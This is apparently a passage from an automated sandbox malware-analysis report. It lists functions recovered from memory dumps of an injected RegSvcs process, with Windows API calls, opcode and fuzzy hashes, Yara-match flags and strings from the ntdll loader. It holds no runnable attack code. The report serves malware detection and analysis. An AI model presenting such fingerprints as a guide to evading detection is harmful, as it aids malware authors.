Uniqueness

Uniqueness Score: -1.00%

Function 01632AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01632ADA

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8c7c7dee90a6aeddcc7c6697ea7e3823b87acf5b562ad1df199e918a20149e60
Instruction ID: 5bf0eab13964d9797bf7fa2a4fc91c001bb075b06433de337417dced4d3b647d
Opcode Fuzzy Hash: 8c7c7dee90a6aeddcc7c6697ea7e3823b87acf5b562ad1df199e918a20149e60
Instruction Fuzzy Hash: 0F900225211400030205B9980B04507004A97D5351355C021F5015650DD66189A15221

Uniqueness

Uniqueness Score: -1.00%

Function 01632D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01632D3A

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7040fe7e86e8ece2ab3fd4bf0ded361fb640eb6ebaab8af703964144fc1a8fea
Instruction ID: 6f93c167cdeb4d18de71683d14d11a3c034baf6b3c0e105c21f84693cb9f93b3
Opcode Fuzzy Hash: 7040fe7e86e8ece2ab3fd4bf0ded361fb640eb6ebaab8af703964144fc1a8fea
Instruction Fuzzy Hash: B990022130140003D240759858186074009E7E1301F55D011E4414654DD95589965322

Uniqueness

Uniqueness Score: -1.00%

Function 01632D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01632D1A

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0a9c0f14c7fb39afc4d1bc32c110f648273636f16b97b75368e4e59119a7740a
Instruction ID: b3ff2dda87287224548235b228809dc38cce4815668179f7fedc34443ee513c9
Opcode Fuzzy Hash: 0a9c0f14c7fb39afc4d1bc32c110f648273636f16b97b75368e4e59119a7740a
Instruction Fuzzy Hash: 0090022921340003D2807598580860B000997D1202F95D415A4015658DC95589A95321

Uniqueness

Uniqueness Score: -1.00%

Function 01632DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01632DFA

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 91ac4241249d8f7a9bb681fedf6b15a3999bbcc223f99239de94cfd5a6055412
Instruction ID: 6b674a2f9c65fce485aa0d2d0dbc036f06efb567f1a7589d07351ad5c573ff5a
Opcode Fuzzy Hash: 91ac4241249d8f7a9bb681fedf6b15a3999bbcc223f99239de94cfd5a6055412
Instruction Fuzzy Hash: 9E90023120140413D21175984904707000D97D0241F95C412A4424658ED6968A92A221

Uniqueness

Uniqueness Score: -1.00%

Function 01632DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01632DDA

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d8c9e7314d3386c1a0f8ccb148df5166ae99316d7ab7a7a78ea696364fc60e90
Instruction ID: ac91e8943fb8b65faeae9c928bac552b55ddf8c3a1f1f0798ab77bee1ae07636
Opcode Fuzzy Hash: d8c9e7314d3386c1a0f8ccb148df5166ae99316d7ab7a7a78ea696364fc60e90
Instruction Fuzzy Hash: 28900221242441535645B5984804507400AA7E0241795C012A5414A50DC5669996D721

Uniqueness

Uniqueness Score: -1.00%

Function 01632C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01632C7A

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e3f33c16256b81e05532d6ed420c9f053a32911e33415ef32aa1202ac6fa55c
Instruction ID: e0d79772ede89fcb84cd39a8bd9225071bc294d4ebdd98ae26d8af0b49fdc6a7
Opcode Fuzzy Hash: 8e3f33c16256b81e05532d6ed420c9f053a32911e33415ef32aa1202ac6fa55c
Instruction Fuzzy Hash: 2890023120148803D2107598880474B000997D0301F59C411A8424758EC6D589D17221

Uniqueness

Uniqueness Score: -1.00%

Function 01632CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01632CAA

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6348e730e07df253665417cffc0bde6082dd6e54309f8d8a2b148fc05a6783ae
Instruction ID: aaba3b338c7dd59ef2c29c8cd25a6a6f1226caab31742bf51eeb3f1ac822c676
Opcode Fuzzy Hash: 6348e730e07df253665417cffc0bde6082dd6e54309f8d8a2b148fc05a6783ae
Instruction Fuzzy Hash: A690023120140403D20079D85808647000997E0301F55D011A9024655FC6A589D16231

Uniqueness

Uniqueness Score: -1.00%

Function 01632F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01632F3A

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b3b15ef49a9907a820746102769467e0e7577d9f70ec6385fee68dcaac08b37c
Instruction ID: e176393305b5167cb2282898917746ee58fe44a8b75da23e240260836c9f5794
Opcode Fuzzy Hash: b3b15ef49a9907a820746102769467e0e7577d9f70ec6385fee68dcaac08b37c
Instruction Fuzzy Hash: E890026134140443D20075984814B070009D7E1301F55C015E5064654EC659CD926226

Uniqueness

Uniqueness Score: -1.00%

Function 01632FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01632FEA

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 81243c75bd76c381b7488f5b965815578150136720198b56dca97719adf0d795
Instruction ID: 2022d401c6fe1a04ba495bdf25ffea2251a7ffc1e756e1e3c8cea3a29148e4f9
Opcode Fuzzy Hash: 81243c75bd76c381b7488f5b965815578150136720198b56dca97719adf0d795
Instruction Fuzzy Hash: E8900221211C0043D30079A84C14B07000997D0303F55C115A4154654DC95589A15621

Uniqueness

Uniqueness Score: -1.00%

Function 01632FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01632FBA

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31bc6a8b005d8c4f403b4a16e09bca50d15d5a01a396abbccb4dac341c49c459
Instruction ID: 0d58e5dd3be527d62270fc839466d05d48571e0e41e87d6374612298c12a0b0f
Opcode Fuzzy Hash: 31bc6a8b005d8c4f403b4a16e09bca50d15d5a01a396abbccb4dac341c49c459
Instruction Fuzzy Hash: 8D90022160140043424075A88C449074009BBE1211755C121A4998650EC59989A55765

Uniqueness

Uniqueness Score: -1.00%

Function 01632F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01632F9A

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 180c3f2efc880720136cc6313ff617357b5b925a30391a99c7e8e79edf92cbb7
Instruction ID: 1cf34c78de0e86574b0a4c0ddd259ad632bc185607e1cb891f1b55209165ad7c
Opcode Fuzzy Hash: 180c3f2efc880720136cc6313ff617357b5b925a30391a99c7e8e79edf92cbb7
Instruction Fuzzy Hash: 3B90023120180403D20075984C1470B000997D0302F55C011A5164655EC66589916671

Uniqueness

Uniqueness Score: -1.00%

Function 01632EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01632EAA

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a68e555f3d2d40c1650b5c984fed6acf5911eaca1ccd55a626425e4cde67e0c7
Instruction ID: bce0014fdeb21f380369054e4ebcd4059bb52e53038bd7f036660dd4ad2fd068
Opcode Fuzzy Hash: a68e555f3d2d40c1650b5c984fed6acf5911eaca1ccd55a626425e4cde67e0c7
Instruction Fuzzy Hash: C590027120140403D24075984804747000997D0301F55C011A9064654FC6998ED56765

Uniqueness

Uniqueness Score: -1.00%

Function 01632E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01632E8A

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 72a4dc8c567956e8b2145a8fee632e482502465bc31bcefa25a207b9abbfd4b2
Instruction ID: 40e16493a836827b6e73b4efdb8a9f0e598f132e0bc5c410725e6bbf25a12b7c
Opcode Fuzzy Hash: 72a4dc8c567956e8b2145a8fee632e482502465bc31bcefa25a207b9abbfd4b2
Instruction Fuzzy Hash: 3690022160140503D20175984804617000E97D0241F95C022A5024655FCA658AD2A231

Uniqueness

Uniqueness Score: -1.00%

Function 00409AA0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D

Strings

&EA, xrefs: 0041A642, 0041A64C

Memory Dump Source

Source File: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &EA
API String ID: 1279760036-1330915590
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A652 Relevance: 3.0, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8

Memory Dump Source

Source File: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: ExitFreeHeapProcess
String ID:
API String ID: 1180424539-0
Opcode ID: 88f434622c633bc27af2c1bf28be723c31b971511076cdf1f3b3b1eadcf465e8
Instruction ID: 7c62ef2e9c5af210fca229e7e6612a7b87500e0c86a304205cdf82c4a5d7c339
Opcode Fuzzy Hash: 88f434622c633bc27af2c1bf28be723c31b971511076cdf1f3b3b1eadcf465e8
Instruction Fuzzy Hash: 48F0F0B1600204AFDB10EF64CC84EEB77A8EF88354F058659F96C5B301DA30EA20CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 58
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: ee4f53a35430c5c1d68b73efa173dcbe9667dd560f633fddae7690584aa10f9e
Instruction ID: 2a8d323920ff48d12539d15ce7e09ae1efddcc1a1390eeb770c6affd5baa7734
Opcode Fuzzy Hash: ee4f53a35430c5c1d68b73efa173dcbe9667dd560f633fddae7690584aa10f9e
Instruction Fuzzy Hash: 7C01B971A4031877EB21A6958C03FFE776CAB40F55F05411DFF04BA1C2D7A9690546E9

Uniqueness

Uniqueness Score: -1.00%

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7B1 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0

Memory Dump Source

Source File: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: a941718e14f809540f9cb1fcdd1daa2e2fcc0822d0c77d51cbeff7b1a986ba12
Instruction ID: c8ee3320983f7650268690fb7534173575ac561414675746a58643d4a70e0bde
Opcode Fuzzy Hash: a941718e14f809540f9cb1fcdd1daa2e2fcc0822d0c77d51cbeff7b1a986ba12
Instruction Fuzzy Hash: CFE09AB2605211AFD720EBA8EC858EBF32DEF803647218457F84887201C335D9A287B6

Uniqueness

Uniqueness Score: -1.00%

Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D

Memory Dump Source

Source File: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7C0 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0

Memory Dump Source

Source File: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6A0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8

Memory Dump Source

Source File: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5

Uniqueness

Uniqueness Score: -1.00%

Function 01632C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01632C24

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 691341e1390decf34118a79a6c3607b3356d52784cbe3e0815e7a1994d80e2e4
Instruction ID: 19d8bfe9fa1af02e80e7f17f3686d75dcc2bd1000b2a34baae90155968a3b88a
Opcode Fuzzy Hash: 691341e1390decf34118a79a6c3607b3356d52784cbe3e0815e7a1994d80e2e4
Instruction Fuzzy Hash: 39B09B719015C5C6DB51F7A44E08717790477D0701F15C065D2030751F4778D1D1E275

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01672349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

MaxLoaderThreads, xrefs: 016724EC
DisableHeapLookaside, xrefs: 0167246D
LdrpInitializeExecutionOptions, xrefs: 0167317D
@, xrefs: 01672B74
ShutdownFlags, xrefs: 016724A1
CFGOptions, xrefs: 01672967
FrontEndHeapDebugOptions, xrefs: 01672489
UseImpersonatedDeviceMap, xrefs: 0167251C
TracingFlags, xrefs: 01672549
UnloadEventTraceDepth, xrefs: 016724C0
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01673176
ExecuteOptions, xrefs: 016725A0
minkernel\ntdll\ldrinit.c, xrefs: 01673187
GlobalFlag2, xrefs: 01672FC0
DisableExceptionChainValidation, xrefs: 0167275F
GlobalFlag, xrefs: 01672F3F, 01673059
MinimumStackCommitInBytes, xrefs: 01672BB0
RaiseExceptionOnPossibleDeadlock, xrefs: 01672579
@, xrefs: 01672942
MaxDeadActivationContexts, xrefs: 01672D82

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 1d0adff9e80d4c721d559de1e32bf41ad22c2ab08a5247cea87b604b92668551
Instruction ID: 88cb0b0bab8eb04a0d2621743475e3e0ae41d143f3eb2d54cc2a7fe3418a7182
Opcode Fuzzy Hash: 1d0adff9e80d4c721d559de1e32bf41ad22c2ab08a5247cea87b604b92668551
Instruction Fuzzy Hash: 4F929B71A04342AFE725CE28CC90B6BB7E9BB84754F04492DFA95DB390D770E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01628620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

8, xrefs: 016652E3
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016654E2
Thread identifier, xrefs: 0166553A
Invalid debug info address of this critical section, xrefs: 016654B6
corrupted critical section, xrefs: 016654C2
Thread is in a state in which it cannot own a critical section, xrefs: 01665543
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0166540A, 01665496, 01665519
Critical section address, xrefs: 01665425, 016654BC, 01665534
Address of the debug info found in the active list., xrefs: 016654AE, 016654FA
double initialized or corrupted critical section, xrefs: 01665508
Critical section address., xrefs: 01665502
undeleted critical section in freed memory, xrefs: 0166542B
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016654CE
Critical section debug info address, xrefs: 0166541F, 0166552E

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 6d6cff5f6ef03425f71e883cd4ae89fa6cb344e6c7174edf7110c26bb988e011
Instruction ID: 64e4d1aaa42da5143803fccd83e54b162d2644d194b87fe0895441af599787ef
Opcode Fuzzy Hash: 6d6cff5f6ef03425f71e883cd4ae89fa6cb344e6c7174edf7110c26bb988e011
Instruction Fuzzy Hash: 26819A70A00359EFDB20CF9ACC46FAEBBF9BB48B04F104119E509BB240D771A945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 016229F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

RtlpResolveAssemblyStorageMapEntry, xrefs: 0166261F
@, xrefs: 0166259B
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01662506
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01662602
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01662624
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016624C0
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016625EB
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016622E4
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01662498
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01662412
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01662409

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: e5e65aac598aa962cfeec36852f1a191d8923d363053e8ef6141e7db0523ac79
Instruction ID: ecd7afbe50c8e141c2bfbd4ac1cee8a6e0b617541c4661a4d194151b68938589
Opcode Fuzzy Hash: e5e65aac598aa962cfeec36852f1a191d8923d363053e8ef6141e7db0523ac79
Instruction Fuzzy Hash: AF026EB1D006299BDB71DB58CC90BEAB7B8AB54704F4041EEE609B7241EB309E85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 01698B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

csrss.exe, xrefs: 01698B80
